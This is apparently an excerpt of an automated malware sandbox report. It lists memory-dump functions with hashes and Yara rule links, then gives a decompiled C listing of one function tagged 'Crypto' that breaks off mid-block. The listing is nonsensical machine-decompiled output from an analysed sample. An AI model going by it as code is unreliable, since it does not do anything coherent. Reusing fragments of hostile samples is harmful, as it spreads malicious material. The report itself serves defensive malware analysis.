                                  • Instruction Fuzzy Hash: 23F03970C0020DAFCF41EFE8D840AAEBBB1FB48300F1085AAEC54A2250D7314A60EF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005A1198, Relevance: .0, Instructions: 21COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116924683.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4e97b6f68ff149e3880cefe2b78306e13c3f327f2835f3c8fe0645436c35a236
                                  • Instruction ID: 0df42605e20b27fd47a992fbf3309b885dcdf923ffc8c92b3f9d875a584fd375
                                  • Opcode Fuzzy Hash: 4e97b6f68ff149e3880cefe2b78306e13c3f327f2835f3c8fe0645436c35a236
                                  • Instruction Fuzzy Hash: 9CF0D4749002189FCB60CFA4CD50B9CFBB1BB49300F20909AAA59AB395D7715E51CF40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A0230, Relevance: .0, Instructions: 21COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 878c04fd9385ed103ff481d54dfe889e0e7f095d24ba3a31b6b03de56f1bd059
                                  • Instruction ID: 44fa6c74a02488c823514c35e55f9e9511b95ea5648b94b339098a56a1ea2c86
                                  • Opcode Fuzzy Hash: 878c04fd9385ed103ff481d54dfe889e0e7f095d24ba3a31b6b03de56f1bd059
                                  • Instruction Fuzzy Hash: C3E04F34905308DFCB04DFA4E54D65DB7B5FB46301F1051A9DC4553351DB715E54DB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A5748, Relevance: .0, Instructions: 21COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4a0e32717f314c3cc9bd279e7392d847bf5b8abbae8fb5b0c755ce6cd7178c39
                                  • Instruction ID: 78b90567fb8001349290331c0f21a2208263422c37549724f93863bcf3d334e3
                                  • Opcode Fuzzy Hash: 4a0e32717f314c3cc9bd279e7392d847bf5b8abbae8fb5b0c755ce6cd7178c39
                                  • Instruction Fuzzy Hash: 74E04630D05208EFCB18EFA0EA499AEFB75BB86301F1091A9EC4427251CB306A58DA94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A00ED, Relevance: .0, Instructions: 17COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6a5250a2ab24f0e422321895e6e7b856f8a821c095c609bbab6186dc23432a35
                                  • Instruction ID: 16c36eee87826ae41ae72b4918fb14a6d719835088312ac6fd1c2488f0ec081d
                                  • Opcode Fuzzy Hash: 6a5250a2ab24f0e422321895e6e7b856f8a821c095c609bbab6186dc23432a35
                                  • Instruction Fuzzy Hash: EFD01735D05209CBCB00CFA8E4842EDB7B0FB89329F208426C118A3240C73149558F50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005A09E4, Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116924683.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 566617a3810cb1585253fceb8712210a56e25aa340579b5a43e72f3df7c17d86
                                  • Instruction ID: 113b63535ba1f2b0d29d322a6dcb1e103fdd12fa2f4a7e7dbade45b86916092e
                                  • Opcode Fuzzy Hash: 566617a3810cb1585253fceb8712210a56e25aa340579b5a43e72f3df7c17d86
                                  • Instruction Fuzzy Hash: F1E0EE399002298FCB64DF60C880BE8BBB1FB48300F2094DAC809AA285D7399A81CF40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A8162, Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f4810b1d6fba16bf8a6a76f7448614088c70fe8f2798a724000474f1376a46fc
                                  • Instruction ID: bd7cd2d56f3c2a13a0477ecb0724d64988b0a9e4d13706fa95868dcc41753144
                                  • Opcode Fuzzy Hash: f4810b1d6fba16bf8a6a76f7448614088c70fe8f2798a724000474f1376a46fc
                                  • Instruction Fuzzy Hash: A5E08CB5D2574A8F8708CF96C1000AEFFB2AFCA304F11D4268409AA229D73441128B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001F23F4, Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115838924.00000000001F2000.00000040.00000001.sdmp, Offset: 001F2000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f66d33f389f575ea9ad5a3f979beae7a52fe40cac47ff11d85b67685297eeffb
                                  • Instruction ID: 368aeb8d0a562352edaec0ae48b7814919582dee656934ac14e114b8c9137c04
                                  • Opcode Fuzzy Hash: f66d33f389f575ea9ad5a3f979beae7a52fe40cac47ff11d85b67685297eeffb
                                  • Instruction Fuzzy Hash: 89D05E79304A818FD7178A1CC1A4BA537D4AB51B04F5644FAE800CB6A3C7B8E981D210
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A31B8, Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6a9d973191cdc903bfdb530a2960fc93a14710d21dc775cc1627976880d0fac0
                                  • Instruction ID: c5d37a2741fa908e139575b3f851335bedf7a23b9737324e6f217f58ea8b5c79
                                  • Opcode Fuzzy Hash: 6a9d973191cdc903bfdb530a2960fc93a14710d21dc775cc1627976880d0fac0
                                  • Instruction Fuzzy Hash: 16D0C77095530CDBC719FF94D94665D7368DB82300F6041E9D804532D1DE712F24D796
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001F23BC, Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115838924.00000000001F2000.00000040.00000001.sdmp, Offset: 001F2000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 724350812d7fc342c1d5e9e31ba9d186d21d4c0de05f3ad19b8e94b7dfcd32c7
                                  • Instruction ID: a175da39ee3c8b7f470a40821871bdee565878ab593fb58569cd6c1b01bb473d
                                  • Opcode Fuzzy Hash: 724350812d7fc342c1d5e9e31ba9d186d21d4c0de05f3ad19b8e94b7dfcd32c7
                                  • Instruction Fuzzy Hash: 06D05E743006858BDB15CA0CC294F6973E4BB44700F0644E8FC008B266C3B8EC80C600
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A841C, Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1dc2a207a0974c902c8572ed0ba62da5363f51f04534eb8a661a6d7d23a7b352
                                  • Instruction ID: 4015a89470c09a486518197d0dd403c501c6ee1ef5e1dc44a6cf35fe4e1ae69b
                                  • Opcode Fuzzy Hash: 1dc2a207a0974c902c8572ed0ba62da5363f51f04534eb8a661a6d7d23a7b352
                                  • Instruction Fuzzy Hash: 92D0A7B14282409ACF108FA0E55458A7BB0EB563587201463C422DD05DC7314541DE62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A00CD, Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8f6791c983ae26ecffdb30931584199605ba64b20a380ae171cfb91cd068f0b7
                                  • Instruction ID: 158bcb72da41b63f948b59ab62d46d061a7082b2b77e773d5928ac3b54f702e8
                                  • Opcode Fuzzy Hash: 8f6791c983ae26ecffdb30931584199605ba64b20a380ae171cfb91cd068f0b7
                                  • Instruction Fuzzy Hash: 17D0C936E05218CFCB04CFA8E8441DCF771FB89229B209066C518B3251C7319916CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A5ED0, Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b13a51b3a029c4b4fb594d0a044e123bb355ab1f4cc9333ee88fa4f63c037aad
                                  • Instruction ID: dd3e4a930867b73886848829fd2bad26a01a6ad24d31d58a67a53700911266a4
                                  • Opcode Fuzzy Hash: b13a51b3a029c4b4fb594d0a044e123bb355ab1f4cc9333ee88fa4f63c037aad
                                  • Instruction Fuzzy Hash: 8ED0C930510308ABD301EFB5BC4D65A76E8EB47212F1041A5984A82263DA3249D0CAA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A8126, Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8dc195e4476a4486186238718c50ce926dd330db6cd19152d3c96fd8ed09c831
                                  • Instruction ID: 33e42b50b9ce17c92a2c6d8bb0d9dfaec1e9b93a21204c35488010568538beaf
                                  • Opcode Fuzzy Hash: 8dc195e4476a4486186238718c50ce926dd330db6cd19152d3c96fd8ed09c831
                                  • Instruction Fuzzy Hash: 04D01275D1564A8F8708CFD3C5400DEBBB29FCA304F15D4678805EB219D63402058BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A6182, Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 72a0d1c31edaeeb36568dc75a5f228bce5285944210f28944a6978b411de936e
                                  • Instruction ID: 5bb548d3b79f53a45a2bf80fbba568a5fc0ea7690744ddab702f1d6dd1d229a6
                                  • Opcode Fuzzy Hash: 72a0d1c31edaeeb36568dc75a5f228bce5285944210f28944a6978b411de936e
                                  • Instruction Fuzzy Hash: B9E0927091232ADFEB54DF24EC94F9CFBB2FB46340F50569A9449AB668DB301A81CF10
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005A03C6, Relevance: .0, Instructions: 13COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116924683.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f53704f4fa22d6b8549a231cf78b0d0cbdf8264722b98a431edb670d99b4d063
                                  • Instruction ID: 4d6f47113257345b9b2bc7ad0eb1499c8f8eaacbd1f59f0205db5cfb0786b218
                                  • Opcode Fuzzy Hash: f53704f4fa22d6b8549a231cf78b0d0cbdf8264722b98a431edb670d99b4d063
                                  • Instruction Fuzzy Hash: D7E01738901226CFCB20DF60DA44AEDBBB0FB59320F1096DA8459A32D4D3319B86CF00
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002AB9E3, Relevance: .0, Instructions: 12COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c51cbe4c2fdd0d29a7a9e454a0e273fb34a546e4b27b458dc87448ef62a00863
                                  • Instruction ID: d88d372af7c1696bc593f7bc528e0569d354b16e52f0f9714e325408d6b904d4
                                  • Opcode Fuzzy Hash: c51cbe4c2fdd0d29a7a9e454a0e273fb34a546e4b27b458dc87448ef62a00863
                                  • Instruction Fuzzy Hash: B7D017B0A2630EDFC700DFA4D44178EB7B1FB86300F5094AA90099A628C7305A96DB19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002AB369, Relevance: .0, Instructions: 11COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d02b9fb3361dee55814d533381cb2c4c9da6ee5f51cd7ac3b62b8b6755500503
                                  • Instruction ID: 21be45e744c594bf17159dc25e504dc8b9b250dfcc4b3ab2610f1a5e5b1da88c
                                  • Opcode Fuzzy Hash: d02b9fb3361dee55814d533381cb2c4c9da6ee5f51cd7ac3b62b8b6755500503
                                  • Instruction Fuzzy Hash: 4FD05E30A1222AEFDB10DB24DC81BCCB3B1FB42300F505696E005A7154CB301E91DF40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A8592, Relevance: .0, Instructions: 10COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7ebc18f8a94f9c92bca43dca6be12f9ea7dfcbe80a9f0af30e46bc221b31cb7c
                                  • Instruction ID: 977775576cdec03715a73ba9073d91102a796a06ed61ee542d41dfc4c8102b80
                                  • Opcode Fuzzy Hash: 7ebc18f8a94f9c92bca43dca6be12f9ea7dfcbe80a9f0af30e46bc221b31cb7c
                                  • Instruction Fuzzy Hash: 75C08C7482B38EDF9700DBD8A04649DBFA0EF4A758B209B028417AA2AACB3414809784
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002AE902, Relevance: .0, Instructions: 9COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d9c8df4d1bd1ae2e952d564ddc0e750f9f94c321ccd8fe02f6bf35b5bc743fee
                                  • Instruction ID: 5fc942e90c4f5414e18da989c1d0665c4f1192f3231c17a3a153541788a62e47
                                  • Opcode Fuzzy Hash: d9c8df4d1bd1ae2e952d564ddc0e750f9f94c321ccd8fe02f6bf35b5bc743fee
                                  • Instruction Fuzzy Hash: 3BD0C9369163998FCB51CFE1D84998DFB31AB06302B119092D04A9F038CB745949CB05
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 002AD3C8, Relevance: 2.8, Strings: 2, Instructions: 320COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: =i&j$=i&j
                                  • API String ID: 0-3966696020
                                  • Opcode ID: 9181820a7cfef035d44652efb91f5ae594f20cc802cbb66dc99640364ad20de7
                                  • Instruction ID: 72c71849b5445334a9fef81768c07f5d71fb26b40b585d5ae7c3a26ec079194c
                                  • Opcode Fuzzy Hash: 9181820a7cfef035d44652efb91f5ae594f20cc802cbb66dc99640364ad20de7
                                  • Instruction Fuzzy Hash: 1FE14774D14219DFDB00DFA4C580AADFBB2FF8A304F2081A9D459AB745CB34AA52DF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A95C0, Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 9A$y!#
                                  • API String ID: 0-1973048155
                                  • Opcode ID: e12a16b2cd6efa091bad9745c8b71a318d936a74f28498c95ddf14110a93518e
                                  • Instruction ID: bc42ab59ed35e0747ef32d629f841a1fc7a26bb8ec9b22c010d5cdd444e1119a
                                  • Opcode Fuzzy Hash: e12a16b2cd6efa091bad9745c8b71a318d936a74f28498c95ddf14110a93518e
                                  • Instruction Fuzzy Hash: 9371ED74D25209EFCB00CFAAD585A9DFBF0FB4A310F64D4AAE415AB210C734AA90CF10
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002AAB30, Relevance: 2.6, Strings: 2, Instructions: 87COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: R]qq$R]qq
                                  • API String ID: 0-3739772065
                                  • Opcode ID: 5a8d9c6532b4aa2f9e62c166071528e7362df7413b86dfe03f047a86220fef43
                                  • Instruction ID: a4600f8ed7d6b5cd521386704380aca8be6c2059dffcb29518dead54acd9e2ea
                                  • Opcode Fuzzy Hash: 5a8d9c6532b4aa2f9e62c166071528e7362df7413b86dfe03f047a86220fef43
                                  • Instruction Fuzzy Hash: 94311A71E057188FEB18CF6AD84479EBBF3AFCA310F04C0AAD848AB255EB3409418F51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002ABEC4, Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: *
                                  • API String ID: 0-163128923
                                  • Opcode ID: 57e772149cc2aa342a8471ec7450c37322dde13858dfbe68bbdea62794766ec9
                                  • Instruction ID: b2910b6d241067904943faad16d015a85eb255356f346582c0717693d6d095d4
                                  • Opcode Fuzzy Hash: 57e772149cc2aa342a8471ec7450c37322dde13858dfbe68bbdea62794766ec9
                                  • Instruction Fuzzy Hash: 88B18C70E14249DFDB04CFA5C990AADFBB2FF8A300F2481A9D455AB756DB349A41DF40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A75A8, Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 2F
                                  • API String ID: 0-2533237832
                                  • Opcode ID: e5eeb2714fecd318c3f8836a30975405ffaffc403c6724ecba93968d0142a34c
                                  • Instruction ID: 730644e978d8a1ad85e691a99635d7bc8b295e64f9f2a9eb329049b61435e290
                                  • Opcode Fuzzy Hash: e5eeb2714fecd318c3f8836a30975405ffaffc403c6724ecba93968d0142a34c
                                  • Instruction Fuzzy Hash: F4510774D18209CFCB04CFA9C9849AEFBF1FB5A300F60855AD815BB215C7709A51DF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A5EF8, Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: `_
                                  • API String ID: 0-3757061437
                                  • Opcode ID: 1a5c7061470024bb69798307e2699156388eb173774b8d3fb04656844c85f8a9
                                  • Instruction ID: 8fb2eced72e6eb13c3ab908156599887b8ce354de5f608ec59632f507310a62d
                                  • Opcode Fuzzy Hash: 1a5c7061470024bb69798307e2699156388eb173774b8d3fb04656844c85f8a9
                                  • Instruction Fuzzy Hash: D1311C71E057188FDB18CF6BDC4469EFBB7AFCA300F18C0AAD448AA255DB3009458F51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0010BDE0, Relevance: 1.2, Instructions: 1241COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115431993.0000000000102000.00000020.00020000.sdmp, Offset: 00100000, based on PE: true
                                  • Associated: 0000000A.00000002.2115416293.0000000000100000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000A.00000002.2115661861.00000000001B4000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 81341a062585c9430d735bdce024d3bad1c8fa148eac73bb465095dd64550193
                                  • Instruction ID: c7d04ab17a9411850429afdacab8a156bac6620c50d2356ecddea8b3a4d63dd6
                                  • Opcode Fuzzy Hash: 81341a062585c9430d735bdce024d3bad1c8fa148eac73bb465095dd64550193
                                  • Instruction Fuzzy Hash: EFA2137640E3C19FCB534BB488B55E27FB0AE6722471E09DBD4C0CF0A3E259195ADB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0010B8B3, Relevance: .6, Instructions: 643COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0010B8B3(intOrPtr* __eax, intOrPtr* __ebx, signed int __ecx, signed char __edx, void* __edi, signed int* __esi, void* __fp0) {
				signed char _t126;
				signed int _t127;
				signed char _t128;
				intOrPtr* _t130;
				intOrPtr* _t139;
				signed char _t140;
				void* _t141;
				signed int* _t142;
				void* _t143;

				_t142 = __esi;
				_t141 = __edi;
				_t140 = __edx;
				 *__esi =  *__esi + __eax;
				asm("outsd");
				 *__ecx = es;
				 *__edx =  *__edx + __ecx;
				 *__ebx =  *__ebx + __eax;
				asm("outsd");
				_push(__ecx);
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				_t139 = (__ecx |  *(__edi - 0x70)) -  *__edx;
				 *((intOrPtr*)(__edx + 0x16060001)) =  *((intOrPtr*)(__edx + 0x16060001)) - __ebx;
				while(1) {
					L4:
					_push(ss);
					 *__ecx =  *__ecx + 1;
					__ebx[0x18000] = __ebx[0x18000] - __bh;
					__dl = __dl -  *__ebx;
					 *__ebx =  *__ebx ^ __al;
					 *__eax =  *__eax + __ch;
					 *__eax =  *__eax + __al;
					 *__ecx =  *__ecx + __cl;
					 *__eax =  *__eax + __al;
					asm("adc [eax], eax");
					__bh = __bh +  *((intOrPtr*)(__ebx - 0x50));
					 *__eax =  *__eax + __al;
					__al = __al + 0xa;
					_push(es);
					__al = __al - 0x1c;
					__al = __al +  *__edx;
					__eflags = __al;
					if(__al != 0) {
						goto L2;
					}
					 *__eax =  *__eax + __al;
					__eflags =  *__eax;
					while(1) {
						 *((intOrPtr*)(__edx + __eax)) =  *((intOrPtr*)(__edx + __eax)) + __al;
						 *((intOrPtr*)(__ecx + __eax)) =  *((intOrPtr*)(__ecx + __eax)) - __dl;
						__ch = __ch | __ebx[0x16];
						__eflags = __ch;
						while(1) {
							L7:
							_pop(__edx);
							asm("insb");
							 *((intOrPtr*)(__esi + 1)) =  *((intOrPtr*)(__esi + 1)) - __dl;
							 *__edx =  *__edx + __cl;
							__bh = 0x28;
							__eax =  *__eax;
							 *__edx =  *__edx + __cl;
							 *__edx =  *__edx + __ch;
							asm("adc esi, [eax]");
							__eax = __eax +  *__eax;
							asm("outsb");
							 *__eax =  *__eax + __al;
							 *__ecx =  *__ecx + __al;
							 *__ecx =  *__ecx + __dl;
							 *__edx =  *__edx + __al;
							__eflags =  *__edx;
							if( *__edx != 0) {
								goto L4;
							}
							 *__eax =  *__eax + __al;
							__al = __al + 0x22;
							 *((intOrPtr*)(__eax + 0xf2e43b3)) =  *((intOrPtr*)(__eax + 0xf2e43b3)) + __al;
							__bh = 0x28 +  *((intOrPtr*)(__ebx - 0x4e));
							 *__eax =  *__eax + __al;
							__al = __al + 0x22;
							 *((intOrPtr*)(__eax + 0x1fec3b3)) =  *((intOrPtr*)(__eax + 0x1fec3b3)) + __al;
							__eax = __eax -  *__ecx;
							_pop(ss);
							__al = __al |  *__esi;
							__al = __al - 0xe;
							__ah = __ah +  *__edx;
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							__eflags =  *__eax;
							if( *__eax >= 0) {
								 *((intOrPtr*)(__edx + __eax)) =  *((intOrPtr*)(__edx + __eax)) + __al;
								 *((intOrPtr*)(__ecx + __eax)) =  *((intOrPtr*)(__ecx + __eax)) - __dl;
								__ch = __ch | __ebx[0x16];
								__eflags = __ch;
								continue;
							} else {
								 *__eax =  *__eax + __al;
								__al = __al;
								__esi = __esi -  *__esi;
								 *__edx =  *__edx + __al;
								__eflags =  *__edx;
								if( *__edx != 0) {
									continue;
								} else {
									 *__eax =  *__eax + __al;
									__al = __al + 0x16;
									 *__ecx =  *__ecx + 1;
									__eax = __eax |  *__edi;
									__al = __al - 0x14;
									__bh = __bh +  *((intOrPtr*)(__edx + __esi * 4));
									 *0x224e080c =  *0x224e080c + __al;
									 *__eax =  *__eax + __al;
									__eflags =  *__edi - 0x59;
									 *__ebx =  *__ebx + __ch;
									asm("adc eax, [eax]");
									__bh = __bh +  *((intOrPtr*)(__edx + __esi * 4));
									 *0x224e080c =  *0x224e080c + __al;
									 *__eax =  *__eax + __al;
									__eflags =  *__edi - 0x58;
									 *__eax =  *__eax + __al;
									__ch = __ch +  *__eax;
									 *__eax = __al;
									 *__edx =  *__edx + __cl;
									 *__edx =  *__edx + __ch;
									 *__eax =  *__eax + __al;
									asm("adc esi, [eax]");
									__eax = __eax + 0x12600;
									 *__esi =  *__esi + __al;
									 *__ecx =  *__ecx + __dl;
									 *__ecx =  *__ecx + __bl;
									__edi = __esi;
									 *__ecx =  *__ecx + __al;
									__eax = __eax & 0x73161616;
									__ebx = __esi;
									 *__eax =  *__eax + __al;
									__ah = __ah |  *(__esi + 0x25010000 + __edi * 2);
									ss = __esi;
									__ch = __ch +  *__eax;
									_push(__ebx);
									 *__eax =  *__eax + __eax;
									__dl = __dl |  *__esi;
									__eflags = __dl;
									if(__dl >= 0) {
										L14:
										__ah = __ah |  *(__esi + 0xa010000 + __edi * 2);
										__eax = __eax + 0x9139080c;
										 *__eax =  *__eax + __al;
										 *__esi =  *__esi + __cl;
										__al = __al + 0xd;
										 *(__eax + __ecx * 2) =  *(__eax + __ecx * 2) | __ebp;
										asm("sbb [ebp+0x100007e], ecx");
										__eax = __eax & 0x53280216;
										 *__eax =  *__eax + __eax;
										__al = __al |  *__edx;
										 *((intOrPtr*)(__ecx + __eax)) =  *((intOrPtr*)(__ecx + __eax)) - __dl;
										__dh = __dh | __ebx[0x16];
										 *__eax =  *__eax + __al;
										__ah = __ah |  *(__esi + 0x25010000 + __edi * 2);
										__eflags = __ah;
										goto L15;
									} else {
										 *__eax =  *__eax + __al;
										__ah = __ah |  *(__esi + 0x25010000 + __edi * 2);
										asm("sbb [esi], dl");
										__ch = __ch +  *__eax;
										_push(__esp);
										 *__eax =  *__eax + __eax;
										__dh = __dh | __ebx[0x16];
										 *__eax =  *__eax + __al;
										__ah = __ah |  *(__esi + 0xa010000 + __edi * 2);
										__al = __al + 0xb;
										es = cs;
										__al = __al - 0x40;
										asm("sbb [ebp+0x100007e], ecx");
										__eax = __eax & 0x53280216;
										 *__eax =  *__eax + __eax;
										__dl = __dl |  *__esi;
										__eflags = __dl;
										if(__dl >= 0) {
											L15:
											__eax = __eax & 0x28021617;
											_push(__esp);
											 *__eax =  *__eax + __eax;
											__dh = __dh | __ebx[0x16];
											 *__eax =  *__eax + __al;
											__ah = __ah |  *(__esi + 0x25010000 + __edi * 2);
											__eflags = __ah;
										} else {
											 *__eax =  *__eax + __al;
											__ah = __ah |  *(__esi + 0x25010000 + __edi * 2);
											__eflags = __ah;
											_pop(ss);
											_push(ss);
											_push(ss);
											if(__eflags < 0) {
												 *__eax =  *__eax + __al;
												__ah = __ah |  *(__esi + 0x25010000 + __edi * 2);
												asm("sbb [edx], al");
												__ebx[0] = __ebx[0] - __dl;
												 *__edx =  *__edx + __cl;
												__ch = __ch +  *__eax;
												_push(__esp);
												 *__eax =  *__eax + __eax;
												__dh = __dh | __ebx[0x16];
												 *__eax =  *__eax + __al;
												__eflags =  *__eax;
												goto L14;
											}
										}
									}
									asm("movsb");
									if (__eflags <= 0) goto L17;
									 *__ecx =  *__ecx + __al;
									__eax = __eax & 0x53280218;
									 *__eax =  *__eax + __eax;
									__dl = __dl |  *__esi;
									__eflags = __dl;
									if(__dl >= 0) {
										L23:
